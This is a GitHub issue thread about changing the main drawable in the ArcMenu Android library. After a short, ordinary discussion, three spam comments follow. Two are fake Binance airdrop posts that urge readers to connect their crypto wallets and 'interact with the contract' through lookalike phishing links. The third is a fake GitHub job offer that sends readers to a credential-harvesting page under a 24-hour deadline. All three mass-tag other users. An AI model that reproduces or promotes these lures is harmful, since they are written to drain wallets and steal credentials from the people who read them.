### ISSUE TITLE
Modify Main Drawable

### ISSUE THREAD

**Issue by jpshelley** [daCapricorn/ArcMenu#25]
I didn't see it in the docs anywhere. But it would be cool to change the drawable for the initial item.

Anyone want to tackle this with an xml attr?
maybe:
arc:button="@drawable/..."

**Comment by anirudhmaddy** [comment]
I was also looking for the same thing, did you find a solution jpshelley ?

**Comment by jpshelley** [comment]
@anirudhmaddy No. Haven't played with this since Material Design came out and a bunch more similar libraries came out. I'll leave the 'issue' alone, but I won't be using it honestly.

**Comment by Mikhail-dev** [comment]
jpshelley, could you please tell me a similar library? I'm looking for this one, because I also want change main drawable, but I can not find library where buttons throw as in this library. 
Thanks in advance!

**Comment by jpshelley** [comment]
@Mikhail-dev check out http://android-arsenal.com/ and just search around. Or google for it. There's plenty of tools out there that you can browse by category. There's gotta be at least 10 of them out there.

**Comment by shafwansyah** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

🎉 Congratulations! You've won a share of the $1.500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. But that's not all—connect now, and you'll instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://link.bnbreward.online/0mhPJ2)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](http://link.bnbreward.online/0mhPJ2) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1.500k in BNB! Plus, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, seize the chance to win up to $20,000—it's your golden opportunity!


Winners: @

**Comment by rafly2103** [comment]
# $BNB Airdrop: Claim Your $1000 in BNB Now!

🎉 Congratulations! You've been selected to receive a portion of the $1.5k Binance Airdrop. We're thrilled to offer you $1500 in BNB. But wait, there's more—connect now, and instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://miro.medium.com/v2/resize:fit:1400/1*57DPVRALhv45ef334fpetQ.jpeg)](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1000 in BNB! Additionally, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, take the opportunity to win up to $20,000—it's your golden chance!


Winners: @satyambnsal, @plusplusxu, @h0ngcha0, @wlchn, @whereissam, @alvyjudy, @JorisZierold

**Comment by Mortal-zz** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
EdemGold, @RikSchoonbeek, @BlinkyStitt, @aturX, @Migue2004, @Weapon-X6, @ajeetbpr, @gabrieeel, @kalloc, @DukeCaesar, @kilic, @terencebeauj, @jetaggart, @ahmedahmedov, @cyqxyy, @wilsonodpn, @taquila123, @wangbar0133, @blutooth, @lemansVector1
